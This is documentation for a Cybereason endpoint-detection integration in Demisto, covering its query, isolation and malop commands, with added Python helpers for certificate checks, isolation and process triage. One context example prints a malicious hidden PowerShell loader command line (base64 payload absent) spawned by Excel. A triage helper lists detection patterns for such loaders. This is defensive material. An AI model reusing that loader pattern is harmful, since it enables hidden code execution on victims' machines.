Cybereason

Cybereason is an endpoint detection and response platform used through Demisto to manage and query malops, connections, and processes.


This integration was integrated and tested with Cybereason v17.5.20.

Important Notes

  1. The integration supports both basic authentication and client-certificate authentication.
  2. Decrypt the certificate .pfx file outside of Demisto.
  3. If you plan to fetch incidents, read the important notes in the Fetched Incidents Data section.
  4. Insert the decrypted certificate in the Certificate field under the Credentials tab, using the following template.
Bag Attributes
<ATTRIBUTES>
-----BEGIN CERTIFICATE-----
<CERTIFICATE>
-----END CERTIFICATE-----
-----BEGIN RSA PRIVATE KEY-----
<KEY>
-----END RSA PRIVATE KEY-----
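The template above is the shape produced by `openssl pkcs12 -in client.pfx -nodes -out client.pem`: bag attributes, the certificate, then the unencrypted private key. Recent OpenSSL releases write that key with a PKCS#8 `BEGIN PRIVATE KEY` header; `openssl rsa -in key.pem` rewrites it in the traditional `BEGIN RSA PRIVATE KEY` form shown in the template (OpenSSL 3 needs the `-traditional` flag). The following is an added example, not part of the integration: a small check to run over the PEM before pasting it into the Certificate field, confirming it has a certificate block and a private key block, that the key still carries the template's header, and that it is no longer encrypted. The sample PEM is constructed with obviously fake bodies; `check_certificate_field` and `pem_blocks` are names chosen here.

```python
import re

# Constructed sample in the page's template shape. The bodies are placeholders,
# not a real certificate or key.
SAMPLE_PEM = """Bag Attributes
    friendlyName: demisto-client
    localKeyID: 01 02 03
-----BEGIN CERTIFICATE-----
MIIBfakeCertificateBodyPlaceholder==
-----END CERTIFICATE-----
-----BEGIN RSA PRIVATE KEY-----
MIIEfakeKeyBodyPlaceholder==
-----END RSA PRIVATE KEY-----
"""

# One PEM block: the END label must repeat the BEGIN label (backreference \1).
BLOCK_RE = re.compile(r"-----BEGIN ([A-Z ]+)-----\n(.*?)\n-----END \1-----", re.S)


def pem_blocks(text):
    """Return (label, body) for every well-formed PEM block in `text`, in order."""
    return [(m.group(1), m.group(2)) for m in BLOCK_RE.finditer(text)]


def check_certificate_field(text):
    """Compare decrypted PEM material against the integration's template.

    Returns a list of problems; an empty list means the material has a
    certificate block and an unencrypted RSA private key block.
    """
    problems = []
    labels = [label for label, _ in pem_blocks(text)]

    if "CERTIFICATE" not in labels:
        problems.append("no CERTIFICATE block")

    if "RSA PRIVATE KEY" not in labels:
        if "PRIVATE KEY" in labels:
            # PKCS#8 output of newer OpenSSL; convert with `openssl rsa`.
            problems.append("key is PKCS#8 (BEGIN PRIVATE KEY); template expects BEGIN RSA PRIVATE KEY")
        elif "ENCRYPTED PRIVATE KEY" in labels:
            problems.append("key is still encrypted (BEGIN ENCRYPTED PRIVATE KEY)")
        else:
            problems.append("no private key block")

    # Traditional RSA keys signal encryption with a Proc-Type header inside the block.
    if "Proc-Type: 4,ENCRYPTED" in text:
        problems.append("RSA key is still encrypted (Proc-Type: 4,ENCRYPTED header)")

    # The template lists the certificate before the key.
    if "CERTIFICATE" in labels and "RSA PRIVATE KEY" in labels:
        if labels.index("CERTIFICATE") > labels.index("RSA PRIVATE KEY"):
            problems.append("certificate block should come before the private key block")

    return problems


if __name__ == "__main__":
    print(check_certificate_field(SAMPLE_PEM) or "PEM matches the template")
```

Run it on the file written by `openssl pkcs12 -nodes` (read the file into `text`) before pasting; each reported problem maps to one OpenSSL conversion step.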

Configure Cybereason on Demisto

  1. Navigate to Settings > Integrations > Servers & Services.
  2. Search for Cybereason.
  3. Click Add instance to create and configure a new integration instance.
    • Name : a textual name for the integration instance.
    • Server URL (e.g., https://192.168.0.1)
    • Credentials
    • Trust any certificate (not secure)
    • Use system proxy settings
    • Fetch incidents
    • Incident type
  4. Click Test to validate the URLs, token, and connection.

Fetched Incidents Data

Demisto fetches the first batch of Cybereason malops from the previous three days.
After the first batch of fetched malops, Demisto fetches new Cybereason malops as soon as they are generated in Cybereason.

IMPORTANT: To fetch incidents properly, set the pre-processing script to CybereasonPreProcessing for the incident type you configure in each integration instance. For example, if you select the Malware incident type, set the pre-processing script for the Malware incident type to CybereasonPreProcessing.

Integration Instance Configuration

[Screenshot: integration instance configuration]

Malware Incident Type Configuration

[Screenshot: pre-processing script set to CybereasonPreProcessing for the Malware incident type]

Commands

You can execute these commands from the Demisto CLI, as part of an automation, or in a playbook. After you successfully execute a command, a DBot message appears in the War Room with the command details.

  1. Search for processes: cybereason-query-processes
  2. Check connection to Cybereason server: cybereason-is-probe-connected
  3. Search for connections: cybereason-query-connections
  4. Isolate a machine from the network: cybereason-isolate-machine
  5. Take machine out of isolation: cybereason-unisolate-machine
  6. Get a list and details for all malops: cybereason-query-malops
  7. Get the processes involved in malops: cybereason-malop-processes
  8. Add a comment to a malop: cybereason-add-comment
  9. Update malop status: cybereason-update-malop-status
  10. Prevent a malop process file: cybereason-prevent-file
  11. Allow a malop process file: cybereason-unprevent-file
  12. Get information for a file: cybereason-query-file
  13. Get information for a domain: cybereason-query-domain
  14. Get information for a user: cybereason-query-user

1. Search for processes


Searches for processes with various filters.

Base Command

cybereason-query-processes

Input
Argument Name Description Required
machine Machine hostname Optional
onlySuspicious Show only suspicious processes Optional
limit Maximum number of results to retrieve Optional
processName Process name to filter by Optional
saveToContext If true, save the result to the context Optional
hasIncomingConnection Filter only processes with incoming connections Optional
hasOutgoingConnection Filter only processes with outgoing connections Optional

Context Output
Path Description
Process.Name The process name
Process.Malicious Malicious status of the process
Process.CreationTime Process creation time
Process.EndTime Process end time
Process.CommandLine Command line of the process
Process.SignedAndVerified Is the process signed and verified
Process.ProductType Product type
Process.Children Children of the process
Process.Parent Parent process
Process.OwnerMachine Machine hostname
Process.User The user who ran the process
Process.ImageFile Image file of the process
Process.SHA1 SHA-1 of the process file
Process.MD5 MD5 of the process file
Process.CompanyName Company name
Process.ProductName Product name

Command Example
!cybereason-query-processes machine=DESKTOP-VUO0QPN hasOutgoingConnection=true hasIncomingConnection=true
Context Example
{
    "Process": [
        {
            "CommandLine": "C:\\Windows\\system32\\svchost.exe -k LocalService",
            "CompanyName": "Microsoft Corporation",
            "CreationTime": "2018-08-06T23:46:30",
            "EndTime": "2018-08-06T23:45:11",
            "ImageFile": "svchost.exe",
            "MD5": "32569e403279b3fd2edb7ebd036273fa",
            "Malicious": "indifferent",
            "Name": "svchost.exe",
            "OwnerMachine": "DESKTOP-VUO0QPN",
            "Parent": "services.exe",
            "ProductName": "Microsoft® Windows® Operating System",
            "ProductType": "SVCHOST",
            "SHA1": "660b76b6fb802417d513adc967c5caf77fc2bac6",
            "SignedandVerified": "true",
            "User": "desktop-vuo0qpn\\local service"
        }
    ]
}
Human Readable Output

Cybereason Processes

Name: svchost.exe
Malicious: indifferent
Creation Time: 2018-08-06T23:46:30
End Time: 2018-08-06T23:45:11
Command Line: C:\Windows\system32\svchost.exe -k LocalService
Signed and Verified: true
Product Type: SVCHOST
Children: (not set)
Parent: services.exe
Owner Machine: DESKTOP-VUO0QPN
User: desktop-vuo0qpn\local service
Image File: svchost.exe
SHA1: 660b76b6fb802417d513adc967c5caf77fc2bac6
MD5: 32569e403279b3fd2edb7ebd036273fa
Company Name: Microsoft Corporation
Product Name: Microsoft® Windows® Operating System

2. Check connection to Cybereason server


Checks if the machine is currently connected to the Cybereason server.

Base Command

cybereason-is-probe-connected

Input
Argument Name Description Required
machine Hostname of the machine to check Required

Context Output
Path Type Description
Cybereason.Machine.isConnected boolean true if machine is connected, false if machine is not connected
Cybereason.Machine.Name string Machine name

Command Example
!cybereason-is-probe-connected machine=DESKTOP-VUO0QPN
Context Example
{
    "Cybereason": {
        "Machine": {
            "Name": "DESKTOP-VUO0QPN",
            "isConnected": true
        }
    }
}
Human Readable Output

true

3. Search for connections


Searches for connections.

Base Command

cybereason-query-connections

Input
Argument Name Description Required
ip Filter connections that contain this IP (in or out) Optional
machine Filter connections on the specified machine Optional
saveToContext If true, save the result to the context Optional

Context Output
Path Description
Connection.Name Connection name
Connection.Direction OUTGOING/INCOMING
Connection.ServerAddress Address of the Cybereason machine
Connection.ServerPort Port of the Cybereason machine
Connection.PortType Connection type
Connection.ReceivedBytes Received bytes count
Connection.TransmittedBytes Transmitted bytes count
Connection.RemoteCountry Connection's remote country
Connection.OwnerMachine Machine hostname
Connection.OwnerProcess The process that performed the connection
Connection.CreationTime Connection creation time
Connection.EndTime Connection end time

Command Example
!cybereason-query-connections ip=192.168.39.128
Context Example
{
    "Connection": [
        {
            "CreationTime": "2018-04-30T18:12:28",
            "Direction": "OUTGOING",
            "Name": "172.16.3.7:48300 \u003e 54.235.96.83:8443",
            "OwnerMachine": "ip-172-16-3-7.ec2.internal",
            "OwnerProcess": "cybereason-sens",
            "RemoteCountry": "United States",
            "ServerAddress": "54.235.96.83",
            "ServerPort": "8443"
        }
    ]
}
Human Readable Output

Cybereason Connections

Name: 172.16.3.7:48300 > 54.235.96.83:8443
Direction: OUTGOING
Server Address: 54.235.96.83
Server Port: 8443
Port Type: (not set)
Received Bytes: (not set)
Transmitted Bytes: (not set)
Remote Country: United States
Owner Machine: ip-172-16-3-7.ec2.internal
Owner Process: cybereason-sens
Creation Time: 2018-04-30T18:12:28
End Time: (not set)

4. Isolate machine from the network


Isolates a machine that has been infected from the rest of the network.

Base Command

cybereason-isolate-machine

Input
Argument Name Description Required
machine Machine name to be isolated Required

Context Output
Path Type Description
Cybereason.Machine string Machine name
Cybereason.IsIsolated boolean Is the machine isolated
Endpoint.Hostname string Machine name

Command Example
!cybereason-isolate-machine machine=DESKTOP-VUO0QPN
Context Example
{
    "Cybereason": {
        "IsIsolated": true,
        "Machine": "DESKTOP-VUO0QPN"
    },
    "Endpoint": {
        "Hostname": "DESKTOP-VUO0QPN"
    }
}
Human Readable Output

Machine was isolated successfully.
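Commands 2 and 4 are usually chained: confirm that the host's sensor is connected before sending the isolation request, so that a playbook can tell "sensor offline" apart from "isolation failed" when it reports back. The following is an added example of that logic, not code from the integration. In a real Demisto automation, `execute` would be `demisto.executeCommand`; the return shape used here (a list of entries with `Type`, `Contents` and `EntryContext`, where `Type` 4 is an error entry) is the platform's, while the context paths are the ones shown in this page's Context Examples. `fake_execute` and its host table are a constructed stand-in so the example runs without a Cybereason server; `isolate_if_connected`, `first_error` and `get_context` are names chosen here.

```python
ERROR_ENTRY_TYPE = 4  # Demisto entryTypes['error']


def first_error(entries):
    """Return the message of the first error entry, or None if none failed."""
    for entry in entries:
        if entry.get("Type") == ERROR_ENTRY_TYPE:
            return str(entry.get("Contents"))
    return None


def get_context(entries, *path):
    """Walk EntryContext along `path` (e.g. "Cybereason", "Machine", "isConnected")."""
    for entry in entries:
        node = entry.get("EntryContext") or {}
        for key in path:
            node = node.get(key) if isinstance(node, dict) else None
            if node is None:
                break
        if node is not None:
            return node
    return None


def isolate_if_connected(machine, execute):
    """Isolate `machine` only when cybereason-is-probe-connected reports true.

    Returns a dict a playbook can branch on: action is one of
    "isolated", "skipped" (sensor offline), "failed" or "none" (lookup error).
    """
    entries = execute("cybereason-is-probe-connected", {"machine": machine})
    err = first_error(entries)
    if err:
        return {"machine": machine, "action": "none", "reason": f"connectivity check failed: {err}"}

    if get_context(entries, "Cybereason", "Machine", "isConnected") is not True:
        return {"machine": machine, "action": "skipped",
                "reason": "sensor not connected; isolation request not sent"}

    entries = execute("cybereason-isolate-machine", {"machine": machine})
    err = first_error(entries)
    if err:
        return {"machine": machine, "action": "failed", "reason": err}

    isolated = get_context(entries, "Cybereason", "IsIsolated") is True
    return {"machine": machine, "action": "isolated" if isolated else "failed",
            "reason": "" if isolated else "IsIsolated not set in context"}


# Constructed stand-in for demisto.executeCommand, built from the page's Context
# Examples. Two hosts are known; any other name yields an error entry.
FAKE_SENSORS = {"DESKTOP-VUO0QPN": True, "LAPTOP-OFFLINE": False}


def fake_execute(command, args):
    machine = args.get("machine")
    if machine not in FAKE_SENSORS:
        return [{"Type": ERROR_ENTRY_TYPE, "Contents": f"Could not find machine {machine}"}]
    if command == "cybereason-is-probe-connected":
        connected = FAKE_SENSORS[machine]
        return [{"Type": 1, "Contents": connected,
                 "EntryContext": {"Cybereason": {"Machine": {"Name": machine, "isConnected": connected}}}}]
    if command == "cybereason-isolate-machine":
        return [{"Type": 1, "Contents": "Machine was isolated successfully.",
                 "EntryContext": {"Cybereason": {"IsIsolated": True, "Machine": machine},
                                  "Endpoint": {"Hostname": machine}}}]
    raise ValueError(f"unexpected command {command}")


if __name__ == "__main__":
    for host in ("DESKTOP-VUO0QPN", "LAPTOP-OFFLINE", "UNKNOWN-HOST"):
        print(isolate_if_connected(host, fake_execute))
```

The decision dict, not the human-readable string, is what the calling playbook should branch on; the "skipped" outcome is the one that deserves a follow-up task rather than a closed incident.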

5. Take machine out of isolation


Removes network isolation from a machine that was previously isolated.

Base Command

cybereason-unisolate-machine

Input
Argument Name Description Required
machine Name of machine to take out of isolation Required

Context Output
Path Type Description
Cybereason.Machine string Machine name
Cybereason.IsIsolated boolean Is the machine isolated
Endpoint.Hostname string Machine name

Command Example
!cybereason-unisolate-machine machine=DESKTOP-VUO0QPN raw-response=true
Context Example
{
    "Cybereason": {
        "IsIsolated": false,
        "Machine": "DESKTOP-VUO0QPN"
    },
    "Endpoint": {
        "Hostname": "DESKTOP-VUO0QPN"
    }
}
Human Readable Output

Machine was un-isolated successfully.

6. Get a list and details for all malops


Returns a list and details of all malops.

Base Command

cybereason-query-malops

Input
Argument Name Description Required
filters The filters to filter the response by (given in Cybereason API syntax) Optional
totalResultLimit The total number of results to return for your server. To reduce system overload and maximize server performance, make sure the limit is a reasonable number. Optional
perGroupLimit The number of items to return for each malop group Optional
templateContext The level of detail to provide in the response. Possible values include:
  • SPECIFIC: Reference values contain only the count in the ElementValues class. The Suspicions map is calculated for each result, with the suspicion name and the first time the suspicion appeared. The Evidence map is not calculated for the results.
  • CUSTOM: Reference values contain the specific Elements, up to the limit defined in the perFeatureLimit parameter. The Suspicions map is not calculated for the results. The Evidence map is not calculated for the results.
  • DETAILS: Reference values contain the specific Elements, up to the limit defined in the perFeatureLimit parameter. The Suspicions map is calculated for each result, containing the suspicion name and the first time the suspicion appeared. The Evidence map is not calculated for the results.
Optional
withinLastDays Return all the malops within the last days Optional

Context Output
Path Type Description
Cybereason.Malops.GUID string Malop GUID
Cybereason.Malops.CreationTime string The time reported as when the malicious behavior began on the system. This is not the time the malop was first detected by Cybereason.
Cybereason.Malops.DecisionFeature string The reason that Cybereason raised the malop
Cybereason.Malops.Link string Link to the malop on Cybereason
Cybereason.Malops.Suspects string Malop suspect type and name
Cybereason.Malops.LastUpdatedTime string Last updated time of malop
Cybereason.Malops.AffectedMachine string List of machines affected by this malop
Cybereason.Malops.InvolvedHash string List of file hashes involved in this malop

Command Example
!cybereason-query-malops
Context Example
{
    "Cybereason": {
        "Malops": [
            {
                "CreationTime": "2018-04-30T14:05:14",
                "DecisionFailure": "maliciousExecutionOfPowerShell",
                "GUID": "11.8371241992421952627",
                "LastUpdateTime": "2018-04-30T14:07:29",
                "Link": "https://integration.cybereason.net:8443/#/malop/11.8371241992421952627",
                "Suspects": "Process: powershell.exe"
            }
        ]
    }
}
Human Readable Output

Cybereason Malops

GUID: 11.8371241992421952627
Link: https://integration.cybereason.net:8443/#/malop/11.8371241992421952627
CreationTime: 2018-04-30T14:05:14
LastUpdateTime: 2018-04-30T14:07:29
DecisionFailure: maliciousExecutionOfPowerShell
Suspects: Process: powershell.exe

7. Get the processes involved in malops

Returns the processes involved in the specified malops.

Base Command

cybereason-malop-processes

Input
Argument Name Description Required
malopGuids Array of malop GUIDs (comma-separated). Retrieve the malop GUID using the cybereason-query-malops command. Required
machinename A CSV list of machine names affected by malops, for example, "machine1,machine2" Optional

Context Output
Path Type Description
Process.Name string Process name
Process.Malicious unknown Malicious status of the process
Process.CreationTime date Process creation time
Process.EndTime date Process end time
Process.CommandLine string The command line of the process
Process.SignedAndVerified unknown Is the process signed and verified
Process.ProductType unknown Product type
Process.Children unknown Children of the process
Process.Parent unknown Parent process
Process.OwnerMachine unknown Machine hostname
Process.User string The user who ran the process
Process.ImageFile unknown Image file of the process
Process.SHA1 string SHA-1 of the process file
Process.MD5 string MD5 of the process file
Process.CompanyName string Company name
Process.ProductName string Product name

Command Example
!cybereason-malop-processes malopGuids=11.8371241992421952627
Context Example
{
    "Process": [
        {
            "CommandLine": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('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')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\"",
            "CompanyName": "Microsoft Corporation",
            "CreationTime": "2018-04-30T14:05:49",
            "EndTime": "2018-04-30T14:06:22",
            "ImageFile": "powershell.exe",
            "MD5": "92f44e405db16ac55d97e3bfe3b132fa",
            "Malicious": "indifferent",
            "Name": "powershell.exe",
            "OwnerMachine": "ROBERTE-EXCASST",
            "Parent": "excel.exe",
            "ProductName": "Microsoft® Windows® Operating System",
            "SHA1": "04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d",
            "User": "darkcap\\roberte"
        }
    ]
}
Human Readable Output

Cybereason Malop Processes

Name: powershell.exe
Malicious: indifferent
Creation Time: 2018-04-30T14:05:49
End Time: 2018-04-30T14:06:22
Command Line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('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')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
Parent: excel.exe
Owner Machine: ROBERTE-EXCASST
User: darkcap\roberte
Image File: powershell.exe
SHA1: 04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
MD5: 92f44e405db16ac55d97e3bfe3b132fa
Company Name: Microsoft Corporation
Product Name: Microsoft® Windows® Operating System
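Note that in the example above the process carries Malicious "indifferent" even though the malop itself was raised for maliciousExecutionOfPowerShell: the per-process verdict alone does not tell an analyst which of the returned processes to look at first. The following is an added example, not code from the integration, of triage logic run over the Process context that cybereason-malop-processes (and cybereason-query-processes) return. It scores each process on the command-line traits and parent relationship visible in the page's own sample and marks the ones worth escalating. The sample input is constructed from the two Context Examples on this page with the base64 payload replaced by a placeholder; the indicator list, `OFFICE_PARENTS`, `triage_process` and `triage` are choices made here, not Cybereason fields.

```python
import re

# Constructed from the page's Context Examples; the base64 blob is a placeholder.
SAMPLE_PROCESSES = [
    {
        "Name": "powershell.exe",
        "Parent": "excel.exe",
        "Malicious": "indifferent",
        "OwnerMachine": "ROBERTE-EXCASST",
        "User": "darkcap\\roberte",
        "SHA1": "04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d",
        "CommandLine": (
            "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe "
            "-NoP -NonI -W Hidden -Exec Bypass -Command \"Invoke-Expression "
            "$([Convert]::FromBase64String('<BASE64 PLACEHOLDER>'))\""
        ),
    },
    {
        "Name": "svchost.exe",
        "Parent": "services.exe",
        "Malicious": "indifferent",
        "OwnerMachine": "DESKTOP-VUO0QPN",
        "User": "desktop-vuo0qpn\\local service",
        "SHA1": "660b76b6fb802417d513adc967c5caf77fc2bac6",
        "CommandLine": "C:\\Windows\\system32\\svchost.exe -k LocalService",
    },
]

# Office parents that rarely have a legitimate reason to spawn PowerShell.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}

# (regex matched case-insensitively against the command line, reason recorded)
PS_INDICATORS = [
    (r"-nop\w*", "PowerShell profile skipped (-NoP)"),
    (r"-noni\w*", "non-interactive session (-NonI)"),
    (r"-w(indowstyle)?\s+hidden", "hidden window (-W Hidden)"),
    (r"-ex\w*\s+bypass", "execution policy bypassed (-Exec Bypass)"),
    (r"-e(nc\w*)?\s+[A-Za-z0-9+/=]{20,}", "encoded command (-EncodedCommand)"),
    (r"frombase64string", "inline base64 decoding (FromBase64String)"),
    (r"invoke-expression|(?<![\w-])iex\b", "dynamic code evaluation (Invoke-Expression)"),
    (r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", "network download helper"),
]


def triage_process(proc):
    """Score one Process context entry; Escalate is set when two or more traits match."""
    reasons = []
    cmd = proc.get("CommandLine", "")
    if proc.get("Name", "").lower() == "powershell.exe" or "powershell" in cmd.lower():
        for pattern, why in PS_INDICATORS:
            if re.search(pattern, cmd, re.I):
                reasons.append(why)
    parent = proc.get("Parent", "")
    if parent.lower() in OFFICE_PARENTS:
        reasons.append(f"spawned by Office application {parent}")
    return {
        "Name": proc.get("Name"),
        "OwnerMachine": proc.get("OwnerMachine"),
        "SHA1": proc.get("SHA1"),
        "Malicious": proc.get("Malicious"),  # kept for reference, not relied on
        "Reasons": reasons,
        "Escalate": len(reasons) >= 2,
    }


def triage(processes):
    """Triage a Process list as returned in context, most reasons first."""
    return sorted((triage_process(p) for p in processes),
                  key=lambda r: len(r["Reasons"]), reverse=True)


if __name__ == "__main__":
    for result in triage(SAMPLE_PROCESSES):
        print(result["Name"], result["Escalate"], result["Reasons"])
```

The SHA1 is carried through so an escalated result can feed straight into cybereason-query-file or cybereason-prevent-file (the latter takes the MD5, which is also in the context).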

8. Add a comment to a malop


Adds a new comment to a malop.

Base Command

cybereason-add-comment

Input
Argument Name Description Required
comment Comment to add to the malop. Required
malopGuid GUID of the malop to add the comment to. Retrieve the malop GUID using the cybereason-query-malops command. Required

Context Output

There is no context output for this command.

Command Example
!cybereason-add-comment comment=NewComment malopGuid=11.8371241992421952627
Human Readable Output

Comment added successfully

9. Update malop status


Updates a malop status.

Base Command

cybereason-update-malop-status

Input
Argument Name Description Required
malopGuid GUID of the malop to update the status of Required
status Status to update Required

Context Output
Path Type Description
Cybereason.Malops.GUID string Malop GUID
Cybereason.Malops.Status string Malop status. Possible values: To Review, Unread, Remediated, Not Relevant

Command Example
!cybereason-update-malop-status malopGuid=11.8371241992421952627 status="To Review"
Context Example
{
    "Cybereason": {
        "Malops": {
            "GUID": "11.8371241992421952627",
            "Status": "To Review"
        }
    }
}
Human Readable Output

Successfully updated malop 11.8371241992421952627 to status To Review

10. Prevent a malop process file


Prevents a malop process file from running on the machine.

Base Command

cybereason-prevent-file

Input
Argument Name Description Required
hash MD5 of the malop process file to prevent Required

Context Output
Path Type Description
Process.MD5 string Process file MD5
Process.Prevent boolean True if process file is prevented

Command Example
!cybereason-prevent-file hash=6fb065fcff8d92da51bba667dc9f770c
Context Example
{
  "Process": {
    "MD5": "6fb065fcff8d92da51bba667dc9f770c",
    "Prevent": true
  }
}
Human Readable Output

File was prevented successfully.

11. Allow a malop process file


Allows a malop process file to run on the machine.

Base Command

cybereason-unprevent-file

Input
Argument Name Description Required
hash MD5 of the malop process file to allow Required

Context Output
Path Type Description
Process.MD5 string Process file MD5
Process.Prevent boolean True if process file is prevented

Command Example
!cybereason-unprevent-file hash=6fb065fcff8d92da51bba667dc9f770c
Context Example
{
  "Process": {
    "MD5": "6fb065fcff8d92da51bba667dc9f770c",
    "Prevent": false
  }
}
Human Readable Output

File was unprevented successfully.

12. Get information for a file


Queries files as part of an investigation.

Base Command

cybereason-query-file

Input
Argument Name Description Required
file_hash File hash (SHA-1 and MD5 supported) Required

Context Output
Path Type Description
Cybereason.File.Path string File path
Cybereason.File.SHA1 string File SHA-1 hash
Cybereason.File.Machine string Machine name on which file is located
Cybereason.File.SuspicionsCount number File suspicions count
Cybereason.File.Name string File name
Cybereason.File.CreationTime date File creation time
Cybereason.File.Suspicion string Object of file suspicions, with the suspicion name as key and the detection date as value
Cybereason.File.OSVersion string Machine OS version on which the file is located
Cybereason.File.ModifiedTime date File modified date
Cybereason.File.Malicious boolean Is file malicious
Cybereason.File.Company string Company name
Cybereason.File.MD5 string File MD5 hash
Cybereason.File.IsConnected boolean Is machine connected to Cybereason
Cybereason.File.Signed boolean Is file signed
Cybereason.File.Evidence string File evidence
Endpoint.Hostname string Hostname on which file is located
Endpoint.OSVersion string Machine OS version on which the file is located
File.Hostname string Hostname on which file is located
File.MD5 string File MD5 hash
File.SHA1 string File SHA-1 hash
File.Name string File name
File.Path string File path

Command Example
!cybereason-query-file file_hash=d40a48094c1f21fef892f27a8b6a7ed2bbf0c27f
Context Example
{
    "Cybereason": {
        "File": [
            {
                "Company": "company",
                "CreationTime": "2018-09-25T20:10:38.000Z",
                "Evidence": [
                    "mimikatzResourceEvidence",
                    "reportedByAntiMalwareEvidence",
                    "malwareClassificationEvidence",
                    "hasLegitClassificationEvidence",
                    "hasNonLegitClassificationEvidence",
                    "whitelistClassificationEvidence"
                ],
                "IsConnected": false,
                "MD5": "b5962945811f8d275a3a69334dbc81e8",
                "Machine": "DESKTOP-UNQ8LCD",
                "Malicious": false,
                "ModifiedTime": "2018-11-14T20:02:34.000Z",
                "Name": "mimikatz.exe",
                "OSVersion": "Windows_10",
                "Path": "c:\\users\\user\\downloads\\mimikatz_trunk\\x64\\mimikatz.exe",
                "SHA1": "d40a48094c1f21fef892f27a8b6a7ed2bbf0c27f",
                "Signed": true,
                "Suspicion": {
                    "fileReputationSuspicion": "2018-11-14T20:02:52.000Z",
                    "mimikatzSuspicion": "2018-11-14T20:02:52.000Z",
                    "reportedByAntiMalwareSuspicion": "2018-11-27T20:56:54.000Z"
                },
                "SuspicionsCount": 3
            }
        ]
    },
    "Endpoint": [
        {
            "Hostname": "DESKTOP-UNQ8LCD",
            "OSVersion": "Windows_10"
        }
    ],
    "File": [
        {
            "Hostname": "DESKTOP-UNQ8LCD",
            "MD5": "b5962945811f8d275a3a69334dbc81e8",
            "Name": "mimikatz.exe",
            "Path": "c:\\users\\user\\downloads\\mimikatz_trunk\\x64\\mimikatz.exe",
            "SHA1": "d40a48094c1f21fef892f27a8b6a7ed2bbf0c27f"
        }
    ]
}
Human Readable Output

[Screenshot of the human-readable output]

13. Get information for a domain


Queries domains as part of an investigation.

Base Command

cybereason-query-domain

Input
Argument Name Description Required
domain Domain to query Required

Context Output
Path Type Description
Cybereason.Domain.Name string Domain name
Cybereason.Domain.Malicious boolean Is domain malicious
Cybereason.Domain.IsInternalDomain boolean Is domain internal
Cybereason.Domain.Reputation string Domain reputation
Cybereason.Domain.SuspicionsCount number Domain suspicions count
Cybereason.Domain.WasEverResolved boolean Was domain ever resolved
Cybereason.Domain.WasEverResolvedAsASecondLevelDomain boolean Was domain ever resolved as a second-level domain
Domain.Name string Domain name

Command Example
!cybereason-query-domain domain=www2.bing.com
Context Example
{
    "Cybereason": {
        "Domain": [
            {
                "IsInternalDomain": false,
                "Malicious": false,
                "Name": "www2.bing.com",
                "Reputation": "indifferent",
                "SuspicionsCount": 0,
                "WasEverResolved": true,
                "WasEverResolvedAsASecondLevelDomain": true
            }
        ]
    },
    "Domain": [
        {
            "Name": "www2.bing.com"
        }
    ]
}
Human Readable Output

[Screenshot of the human-readable output]

14. Get information for a user


Queries users as part of an investigation.

Base Command

cybereason-query-user

Input
Argument Name Description Required
username Username to query Required

Context Output
Path Type Description
Cybereason.User.Username string User name
Cybereason.User.Domain string User domain
Cybereason.User.LastMachineLoggedInTo string Last machine the user logged in to
Cybereason.User.LocalSystem boolean Is local system
Cybereason.User.Organization string User organization

Command Example
!cybereason-query-user username="ec2amaz-5man2hc\\network service"
Context Example
{
    "Cybereason": {
        "User": [
            {
                "Domain": "ec2amaz-5man2hc",
                "LastMachineLoggedInTo": "EC2AMAZ-5MAN2HC",
                "LocalSystem": true,
                "Organization": "INTEGRATION",
                "Username": "ec2amaz-5man2hc\\network service"
            }
        ]
    }
}
Human Readable Output

[Screenshot of the human-readable output]